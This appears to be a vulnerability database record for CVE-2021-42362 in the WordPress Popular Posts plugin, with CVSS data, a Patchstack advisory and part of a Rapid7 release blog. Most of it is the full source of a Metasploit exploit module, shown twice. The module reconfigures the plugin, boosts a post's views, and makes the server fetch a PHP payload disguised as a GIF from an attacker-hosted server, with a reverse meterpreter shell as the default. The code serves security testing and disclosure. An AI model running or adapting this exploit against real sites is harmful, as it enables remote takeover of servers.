fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 || res.code == 301\n print_status(\"Sending #{post_count} views to #{res.headers['Location']}\")\n location = res.headers['Location'].split('/')[3...-1].join('/') # http://example.com/<take this value>/<and anything after>\n (1..post_count).each do |_c|\n res = send_request_cgi!(\n 'uri' => \"/#{location}\",\n 'cookie' => cookie,\n 'keep_cookies' => 'true'\n )\n # just send away, who cares about the response\n fail_with(Failure::Unreachable, 'Site not responding') unless res\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200\n res = send_request_cgi(\n # this URL varies from the POC on EDB, and is modeled after what the browser does\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vars_get' => {\n 'rest_route' => normalize_uri('wordpress-popular-posts', 'v1', 'popular-posts')\n },\n 'keep_cookies' => 'true',\n 'method' => 'POST',\n 'cookie' => cookie,\n 'vars_post' => {\n '_wpnonce' => wp_nonce,\n 'wpp_id' => post_id,\n 'sampling' => 0,\n 'sampling_rate' => 100\n }\n )\n fail_with(Failure::Unreachable, 'Site not responding') unless res\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 201\n end\n fail_with(Failure::Unreachable, 'Site not responding') unless res\n end\n\n def get_top_posts\n print_status('Determining post with most views')\n res = get_widget\n />(?<views>\\d+) views</ =~ res.body\n views = views.to_i\n print_status(\"Top Views: #{views}\")\n views += 5 # make us the top post\n unless datastore['VISTS'].nil?\n print_status(\"Overriding post count due to VISITS being set, from #{views} to #{datastore['VISITS']}\")\n views = datastore['VISITS']\n end\n views\n end\n\n def get_widget\n # load home page to grab the widget ID. At times we seem to hit the widget when it's refreshing and it doesn't respond\n # which then would kill the exploit, so in this case we just keep trying.\n (1..10).each do |_|\n @res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path),\n 'keep_cookies' => 'true'\n )\n break unless @res.nil?\n end\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200\n /data-widget-id=\"wpp-(?<widget_id>\\d+)/ =~ @res.body\n # load the widget directly\n (1..10).each do |_|\n @res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'index.php', 'wp-json', 'wordpress-popular-posts', 'v1', 'popular-posts', 'widget', widget_id),\n 'keep_cookies' => 'true',\n 'vars_get' => {\n 'is_single' => 0\n }\n )\n break unless @res.nil?\n end\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200\n @res\n end\n\n def exploit\n fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0'\n cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])\n\n if cookie.nil?\n vprint_error('Invalid login, check credentials')\n return\n end\n\n payload_name = \"#{Rex::Text.rand_text_alphanumeric(5..8)}.gif.php\"\n vprint_status(\"Payload file name: #{payload_name}\")\n\n fail_with(Failure::NotVulnerable, 'gd is not installed on server, uexploitable') unless check_gd_installed(cookie)\n post_count = get_top_posts\n\n # we dont need to pass the cookie anymore since its now saved into http client\n token = get_wpp_admin_token(cookie)\n vprint_status(\"wpp_admin_token: #{token}\")\n change_settings(cookie, token)\n clear_cache(cookie, token)\n post_id, ajax_nonce, wp_nonce = create_post(cookie)\n print_status('Starting web server to handle request for image payload')\n start_service({\n 'Uri' => {\n 'Proc' => proc { |cli, req| on_request_uri(cli, req, payload_name, post_id) },\n 'Path' => \"/#{payload_name}\"\n }\n })\n\n add_meta(cookie, post_id, ajax_nonce, payload_name)\n boost_post(cookie, post_id, wp_nonce, post_count)\n print_status('Waiting 90sec for cache refresh by server')\n Rex.sleep(90)\n print_status('Attempting to force loading of shell by visiting to homepage and loading the widget')\n res = get_widget\n print_good('We made it to the top!') if res.body.include? payload_name\n # if res.body.include? datastore['SRVHOSTNAME']\n # fail_with(Failure::UnexpectedReply, \"Found #{datastore['SRVHOSTNAME']} in page content. Payload likely wasn't copied to the server.\")\n # end\n # at this point, we rely on our web server getting requests to make the rest happen\n end\nend\n", "sourceHref": "https://0day.today/exploit/37162", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T19:32:11", "description": "The WordPress Popular Posts WordPress plugin is vulnerable to arbitrary file uploads due to insufficient input file type validation found in the ~/src/Image.php file which makes it possible for attackers with contributor level access and above to upload malicious files that can be used to obtain remote code execution, in versions up to and including 5.3.2.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-17T18:15:00", "type": "cve", "title": "CVE-2021-42362", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42362"], "modified": "2021-12-21T20:23:00", "cpe": ["cpe:/a:wordpress_popular_posts_project:wordpress_popular_posts:5.3.2"], "id": "CVE-2021-42362", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-42362", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:wordpress_popular_posts_project:wordpress_popular_posts:5.3.2:*:*:*:*:wordpress:*:*"]}], "packetstorm": [{"lastseen": "2021-12-20T16:50:14", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-20T00:00:00", "type": "packetstorm", "title": "WordPress Popular Posts 5.3.2 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42362"], "modified": "2021-12-20T00:00:00", "id": "PACKETSTORM:165376", "href": "https://packetstormsecurity.com/files/165376/WordPress-Popular-Posts-5.3.2-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::Remote::HTTP::Wordpress \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Wordpress Popular Posts Authenticated RCE', \n'Description' => %q{ \nThis exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. \nThe FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request \nfor the payload, prior to getting a GET request. \nThis exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2. \nThe exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server. \nThen the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget. \nA post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once \nthe post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded \nwhich triggers the plugin to download the payload from our server. Our payload has a 'GIF' header, and a \ndouble extension ('.gif.php') allowing for arbitrary PHP code to be executed. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'h00die', # msf module \n'Simone Cristofaro', # edb \n'Jerome Bruandet' # original analysis \n], \n'References' => [ \n[ 'EDB', '50129' ], \n[ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/' ], \n[ 'WPVDB', 'bd4f157c-a3d7-4535-a587-0102ba4e3009' ], \n[ 'URL', 'https://plugins.trac.wordpress.org/changeset/2542638' ], \n[ 'URL', 'https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601' ], \n[ 'CVE', '2021-42362' ] \n], \n'Platform' => ['php'], \n'Stance' => Msf::Exploit::Stance::Aggressive, \n'Privileged' => false, \n'Arch' => ARCH_PHP, \n'Targets' => [ \n[ 'Automatic Target', {}] \n], \n'DisclosureDate' => '2021-06-11', \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'PAYLOAD' => 'php/meterpreter/reverse_tcp', \n'WfsDelay' => 3000 # 50 minutes, other visitors to the site may trigger \n}, \n'Notes' => { \n'Stability' => [ CRASH_SAFE ], \n'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ], \n'Reliability' => [ REPEATABLE_SESSION ] \n} \n) \n) \n \nregister_options [ \nOptString.new('USERNAME', [true, 'Username of the account', 'admin']), \nOptString.new('PASSWORD', [true, 'Password of the account', 'admin']), \nOptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']), \n# https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560 \nOptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']), \n# https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584 \nOptEnum.new('SRVPORT', [true, 'The local port to listen on.', 'login', ['80', '443', '8080']]), \n] \nend \n \ndef check \nreturn CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online? \n \ncheckcode = check_plugin_version_from_readme('wordpress-popular-posts', '5.3.3') \nif checkcode == CheckCode::Safe \nprint_error('Popular Posts not a vulnerable version') \nend \nreturn checkcode \nend \n \ndef trigger_payload(on_disk_payload_name) \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path), \n'keep_cookies' => 'true' \n) \n# loop this 5 times just incase there is a time delay in writing the file by the server \n(1..5).each do |i| \nprint_status(\"Triggering shell at: #{normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name)} in 10 seconds. Attempt #{i} of 5\") \nRex.sleep(10) \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name), \n'keep_cookies' => 'true' \n) \nend \nif res && res.code == 404 \nprint_error('Failed to find payload, may not have uploaded correctly.') \nend \nend \n \ndef on_request_uri(cli, request, payload_name, post_id) \nif request.method == 'HEAD' \nprint_good('Responding to initial HEAD request (passed check 1)') \n# according to https://stackoverflow.com/questions/3854842/content-length-header-with-head-requests we should have a valid Content-Length \n# however that seems to be calculated dynamically, as it is overwritten to 0 on this response. leaving here as notes. \n# also didn't want to send the true payload in the body to make the size correct as that gives a higher chance of us getting caught \nreturn send_response(cli, '', { 'Content-Type' => 'image/gif', 'Content-Length' => \"GIF#{payload.encoded}\".length.to_s }) \nend \nif request.method == 'GET' \non_disk_payload_name = \"#{post_id}_#{payload_name}\" \nregister_file_for_cleanup(on_disk_payload_name) \nprint_good('Responding to GET request (passed check 2)') \nsend_response(cli, \"GIF#{payload.encoded}\", 'Content-Type' => 'image/gif') \nclose_client(cli) # for some odd reason we need to close the connection manually for PHP/WP to finish its functions \nRex.sleep(2) # wait for WP to finish all the checks it needs \ntrigger_payload(on_disk_payload_name) \nend \nprint_status(\"Received unexpected #{request.method} request\") \nend \n \ndef check_gd_installed(cookie) \nvprint_status('Checking if gd is installed') \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), \n'method' => 'GET', \n'cookie' => cookie, \n'keep_cookies' => 'true', \n'vars_get' => { \n'page' => 'wordpress-popular-posts', \n'tab' => 'debug' \n} \n) \nfail_with(Failure::Unreachable, 'Site not responding') unless res \nfail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 \nres.body.include? ' gd' \nend \n \ndef get_wpp_admin_token(cookie) \nvprint_status('Retrieving wpp_admin token') \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), \n'method' => 'GET', \n'cookie' => cookie, \n'keep_cookies' => 'true', \n'vars_get' => { \n'page' => 'wordpress-popular-posts', \n'tab' => 'tools' \n} \n) \nfail_with(Failure::Unreachable, 'Site not responding') unless res \nfail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 \n/<input type=\"hidden\" id=\"wpp-admin-token\" name=\"wpp-admin-token\" value=\"([^\"]*)/ =~ res.body \nRegexp.last_match(1) \nend \n \ndef change_settings(cookie, token) \nvprint_status('Updating popular posts settings for images') \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), \n'method' => 'POST', \n'cookie' => cookie, \n'keep_cookies' => 'true', \n'vars_get' => { \n'page' => 'wordpress-popular-posts', \n'tab' => 'debug' \n}, \n'vars_post' => { \n'upload_thumb_src' => '', \n'thumb_source' => 'custom_field', \n'thumb_lazy_load' => 0, \n'thumb_field' => 'wpp_thumbnail', \n'thumb_field_resize' => 1, \n'section' => 'thumb', \n'wpp-admin-token' => token \n} \n) \nfail_with(Failure::Unreachable, 'Site not responding') unless res \nfail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Unable to save/change settings') unless /<strong>Settings saved/ =~ res.body \nend \n \ndef clear_cache(cookie, token) \nvprint_status('Clearing image cache') \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), \n'method' => 'POST', \n'cookie' => cookie, \n'keep_cookies' => 'true', \n'vars_get' => { \n'page' => 'wordpress-popular-posts', \n'tab' => 'debug' \n}, \n'vars_post' => { \n'action' => 'wpp_clear_thumbnail', \n'wpp-admin-token' => token \n} \n) \nfail_with(Failure::Unreachable, 'Site not responding') unless res \nfail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 \nend \n \ndef enable_custom_fields(cookie, custom_nonce, post) \n# this should enable the ajax_nonce, it will 302 us back to the referer page as well so we can get it. \nres = send_request_cgi!( \n'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post.php'), \n'cookie' => cookie, \n'keep_cookies' => 'true', \n'method' => 'POST', \n'vars_post' => { \n'toggle-custom-fields-nonce' => custom_nonce, \n'_wp_http_referer' => \"#{normalize_uri(target_uri.path, 'wp-admin', 'post.php')}?post=#{post}&action=edit\", \n'action' => 'toggle-custom-fields' \n} \n) \n/name=\"_ajax_nonce-add-meta\" value=\"([^\"]*)/ =~ res.body \nRegexp.last_match(1) \nend \n \ndef create_post(cookie) \nvprint_status('Creating new post') \n# get post ID and nonces \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post-new.php'), \n'cookie' => cookie, \n'keep_cookies' => 'true' \n) \nfail_with(Failure::Unreachable, 'Site not responding') unless res \nfail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 \n/name=\"_ajax_nonce-add-meta\" value=\"(?<ajax_nonce>[^\"]*)/ =~ res.body \n/wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware\\( \"(?<wp_nonce>[^\"]*)/ =~ res.body \n/},\"post\":{\"id\":(?<post_id>\\d*)/ =~ res.body \nif ajax_nonce.nil? \nprint_error('missing ajax nonce field, attempting to re-enable. if this fails, you may need to change the interface to enable this. See https://www.hostpapa.com/knowledgebase/add-custom-meta-boxes-wordpress-posts/. Or check (while writing a post) Options > Preferences > Panels > Additional > Custom Fields.') \n/name=\"toggle-custom-fields-nonce\" value=\"(?<custom_nonce>[^\"]*)/ =~ res.body \najax_nonce = enable_custom_fields(cookie, custom_nonce, post_id) \nend \nunless ajax_nonce.nil? \nvprint_status(\"ajax nonce: #{ajax_nonce}\") \nend \nunless wp_nonce.nil? \nvprint_status(\"wp nonce: #{wp_nonce}\") \nend \nunless post_id.nil? \nvprint_status(\"Created Post: #{post_id}\") \nend \nfail_with(Failure::UnexpectedReply, 'Unable to retrieve nonces and/or new post id') unless ajax_nonce && wp_nonce && post_id \n \n# publish new post \nvprint_status(\"Writing content to Post: #{post_id}\") \n# this is very different from the EDB POC, I kept getting 200 to the home page with their example, so this is based off what the UI submits \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, 'index.php'), \n'method' => 'POST', \n'cookie' => cookie, \n'keep_cookies' => 'true', \n'ctype' => 'application/json', \n'accept' => 'application/json', \n'vars_get' => { \n'_locale' => 'user', \n'rest_route' => normalize_uri(target_uri.path, 'wp', 'v2', 'posts', post_id) \n}, \n'data' => { \n'id' => post_id, \n'title' => Rex::Text.rand_text_alphanumeric(20..30), \n'content' => \"\\n<p>#{Rex::Text.rand_text_alphanumeric(100..200)}</p>\\n\", \n'status' => 'publish' \n}.to_json, \n'headers' => { \n'X-WP-Nonce' => wp_nonce, \n'X-HTTP-Method-Override' => 'PUT' \n} \n) \n \nfail_with(Failure::Unreachable, 'Site not responding') unless res \nfail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Post failed to publish') unless res.body.include? '\"status\":\"publish\"' \nreturn post_id, ajax_nonce, wp_nonce \nend \n \ndef add_meta(cookie, post_id, ajax_nonce, payload_name) \npayload_url = \"http://#{datastore['SRVHOSTNAME']}:#{datastore['SRVPORT']}/#{payload_name}\" \nvprint_status(\"Adding malicious metadata for redirect to #{payload_url}\") \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), \n'method' => 'POST', \n'cookie' => cookie, \n'keep_cookies' => 'true', \n'vars_post' => { \n'_ajax_nonce' => 0, \n'action' => 'add-meta', \n'metakeyselect' => 'wpp_thumbnail', \n'metakeyinput' => '', \n'metavalue' => payload_url, \n'_ajax_nonce-add-meta' => ajax_nonce, \n'post_id' => post_id \n} \n) \nfail_with(Failure::Unreachable, 'Site not responding') unless res \nfail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Failed to update metadata') unless res.body.include? \"<tr id='meta-\" \nend \n \ndef boost_post(cookie, post_id, wp_nonce, post_count) \n# redirect as needed \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, 'index.php'), \n'keep_cookies' => 'true', \n'cookie' => cookie, \n'vars_get' => { 'page_id' => post_id } \n) \nfail_with(Failure::Unreachable, 'Site not responding') unless res \nfail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 || res.code == 301 \nprint_status(\"Sending #{post_count} views to #{res.headers['Location']}\") \nlocation = res.headers['Location'].split('/')[3...-1].join('/') # http://example.com/<take this value>/<and anything after> \n(1..post_count).each do |_c| \nres = send_request_cgi!( \n'uri' => \"/#{location}\", \n'cookie' => cookie, \n'keep_cookies' => 'true' \n) \n# just send away, who cares about the response \nfail_with(Failure::Unreachable, 'Site not responding') unless res \nfail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 \nres = send_request_cgi( \n# this URL varies from the POC on EDB, and is modeled after what the browser does \n'uri' => normalize_uri(target_uri.path, 'index.php'), \n'vars_get' => { \n'rest_route' => normalize_uri('wordpress-popular-posts', 'v1', 'popular-posts') \n}, \n'keep_cookies' => 'true', \n'method' => 'POST', \n'cookie' => cookie, \n'vars_post' => { \n'_wpnonce' => wp_nonce, \n'wpp_id' => post_id, \n'sampling' => 0, \n'sampling_rate' => 100 \n} \n) \nfail_with(Failure::Unreachable, 'Site not responding') unless res \nfail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 201 \nend \nfail_with(Failure::Unreachable, 'Site not responding') unless res \nend \n \ndef get_top_posts \nprint_status('Determining post with most views') \nres = get_widget \n/>(?<views>\\d+) views</ =~ res.body \nviews = views.to_i \nprint_status(\"Top Views: #{views}\") \nviews += 5 # make us the top post \nunless datastore['VISTS'].nil? \nprint_status(\"Overriding post count due to VISITS being set, from #{views} to #{datastore['VISITS']}\") \nviews = datastore['VISITS'] \nend \nviews \nend \n \ndef get_widget \n# load home page to grab the widget ID. At times we seem to hit the widget when it's refreshing and it doesn't respond \n# which then would kill the exploit, so in this case we just keep trying. \n(1..10).each do |_| \n@res = send_request_cgi( \n'uri' => normalize_uri(target_uri.path), \n'keep_cookies' => 'true' \n) \nbreak unless @res.nil? \nend \nfail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 \n/data-widget-id=\"wpp-(?<widget_id>\\d+)/ =~ @res.body \n# load the widget directly \n(1..10).each do |_| \n@res = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, 'index.php', 'wp-json', 'wordpress-popular-posts', 'v1', 'popular-posts', 'widget', widget_id), \n'keep_cookies' => 'true', \n'vars_get' => { \n'is_single' => 0 \n} \n) \nbreak unless @res.nil? \nend \nfail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 \n@res \nend \n \ndef exploit \nfail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0' \ncookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) \n \nif cookie.nil? \nvprint_error('Invalid login, check credentials') \nreturn \nend \n \npayload_name = \"#{Rex::Text.rand_text_alphanumeric(5..8)}.gif.php\" \nvprint_status(\"Payload file name: #{payload_name}\") \n \nfail_with(Failure::NotVulnerable, 'gd is not installed on server, uexploitable') unless check_gd_installed(cookie) \npost_count = get_top_posts \n \n# we dont need to pass the cookie anymore since its now saved into http client \ntoken = get_wpp_admin_token(cookie) \nvprint_status(\"wpp_admin_token: #{token}\") \nchange_settings(cookie, token) \nclear_cache(cookie, token) \npost_id, ajax_nonce, wp_nonce = create_post(cookie) \nprint_status('Starting web server to handle request for image payload') \nstart_service({ \n'Uri' => { \n'Proc' => proc { |cli, req| on_request_uri(cli, req, payload_name, post_id) }, \n'Path' => \"/#{payload_name}\" \n} \n}) \n \nadd_meta(cookie, post_id, ajax_nonce, payload_name) \nboost_post(cookie, post_id, wp_nonce, post_count) \nprint_status('Waiting 90sec for cache refresh by server') \nRex.sleep(90) \nprint_status('Attempting to force loading of shell by visiting to homepage and loading the widget') \nres = get_widget \nprint_good('We made it to the top!') if res.body.include? payload_name \n# if res.body.include? datastore['SRVHOSTNAME'] \n# fail_with(Failure::UnexpectedReply, \"Found #{datastore['SRVHOSTNAME']} in page content. Payload likely wasn't copied to the server.\") \n# end \n# at this point, we rely on our web server getting requests to make the rest happen \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/165376/wp_popular_posts_rce.rb.txt", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "patchstack": [{"lastseen": "2022-06-01T19:31:57", "description": "Authenticated Code Injection vulnerability leading to Remote Code Execution (RCE) discovered by NinTechNet in WordPress Popular Posts plugin (versions <= 5.3.2).\n\n## Solution\n\n\r\n Update the WordPress Popular Posts plugin to the latest available version (at least 5.3.3).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-11T00:00:00", "type": "patchstack", "title": "WordPress Popular Posts plugin <= 5.3.2 - Authenticated Code Injection vulnerability leading to Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42362"], "modified": "2021-06-11T00:00:00", "id": "PATCHSTACK:062661746B8F95E15FCE7B0D84E63AB0", "href": "https://patchstack.com/database/vulnerability/wordpress-popular-posts/wordpress-popular-posts-plugin-5-3-2-authenticated-code-injection-vulnerability-leading-to-remote-code-execution-rce", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2022-01-07T17:52:07", "description": "## Dump Windows secrets from Active Directory\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2022/01/metasploit-ascii-1-2.png)\n\nThis week, our very own [Christophe De La Fuente](<https://github.com/cdelafuente-r7>) added an important [update](<https://github.com/rapid7/metasploit-framework/pull/15924>) to the existing Windows Secret Dump module. It is now able to dump secrets from Active Directory, which will be very useful for Metasploit users. This new feature uses the Directory Replication Service through RPC to retrieve data such as SIDs, password history, Domain user NTLM hashes and Kerberos keys, etc. This replicates the behavior of the famous `impacket` [`secretsdump.py`](<https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py>), with the benefit of being fully integrated with Metasploit Framework. For example, it is possible to [pivot](<https://www.offensive-security.com/metasploit-unleashed/pivoting/>) on a compromised host and run the Windows Secret Dump module against an internal Domain Controller directly from `msfconsole`. Furthermore, the secrets are stored in the internal database, which lets other modules access this information easily.\n\nThis update also brings another big [improvement](<https://github.com/rapid7/ruby_smb/pull/179>) to the `ruby_smb` library. This adds a new DCERPC client and many ready-to-use RPC queries from [Directory Replication Service (DRS) Remote Protocol](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47>), [Security Account Manager (SAM) Remote Protocol](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/4df07fab-1bbc-452f-8e92-7853a3c7e380>) and [Workstation Service Remote Protocol](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/4df07fab-1bbc-452f-8e92-7853a3c7e380>). These will greatly simplify the process of writing modules that use DCERPC against Windows systems.\n\n## Authenticated Catch Themes Demo Import Remote Code Execution\n\nThank you to Ron Jost, Thinkland Security Team, and [h00die](<https://github.com/h00die>) for their community contribution of a Remote Code Execution exploit module against versions 1.8 and earlier of the Catch Themes Demo Import Wordpress Plugin.\n\n## New module content (6)\n\n * [Grafana Plugin Path Traversal](<https://github.com/rapid7/metasploit-framework/pull/15954>) by h00die and jordyv, which exploits [CVE-2021-43798](<https://attackerkb.com/topics/CVE-2021-43798?referrer=blog>) \\- This aAdds a module to exploit Grafana file read vulnerability CVE-2021-43798.\n * [Native LDAP Server (Example)](<https://github.com/rapid7/metasploit-framework/pull/15961>) by RageLtMan and Spencer McIntyre - This adds the initial implementation of an LDAP server implemented in Rex and updates the existing log4shell scanner module to use it as well as provides a new example module.\n * [Wordpress Plugin Catch Themes Demo Import RCE](<https://github.com/rapid7/metasploit-framework/pull/15988>) by Ron Jost, Thinkland Security Team, and h00die, which exploits [CVE-2021-39352](<https://attackerkb.com/topics/s7edbWB4Vg/cve-2021-39352?referrer=blog>) \\- This adds an exploit for the Catch Themes Demo Import Wordpress plugin for versions below `1.8`. The functionality for importing a theme does not properly sanitize file formats, allowing an authenticated user to upload a php payload. Requesting the uploaded file achieves code execution as the user running the web server.\n * [Wordpress Popular Posts Authenticated RCE](<https://github.com/rapid7/metasploit-framework/pull/15948>) by Jerome Bruandet, Simone Cristofaro, and h00die, which exploits [CVE-2021-42362](<https://attackerkb.com/topics/FzFxJJq242/cve-2021-42362?referrer=blog>) \\- This PR adds a new exploit for wp_popular_posts <=5.3.2.\n * [ManageEngine ServiceDesk Plus CVE-2021-44077](<https://github.com/rapid7/metasploit-framework/pull/15950>) by wvu and Y4er, which exploits [CVE-2021-44077](<https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077?referrer=blog>)\n * [Dell DBUtilDrv2.sys Memory Protection Modifier](<https://github.com/rapid7/metasploit-framework/pull/15955>) by Jacob Baines, Kasif Dekel, Red Cursor, and SentinelLabs - This module leverages a write-what-where condition in DBUtilDrv2.sys version 2.5 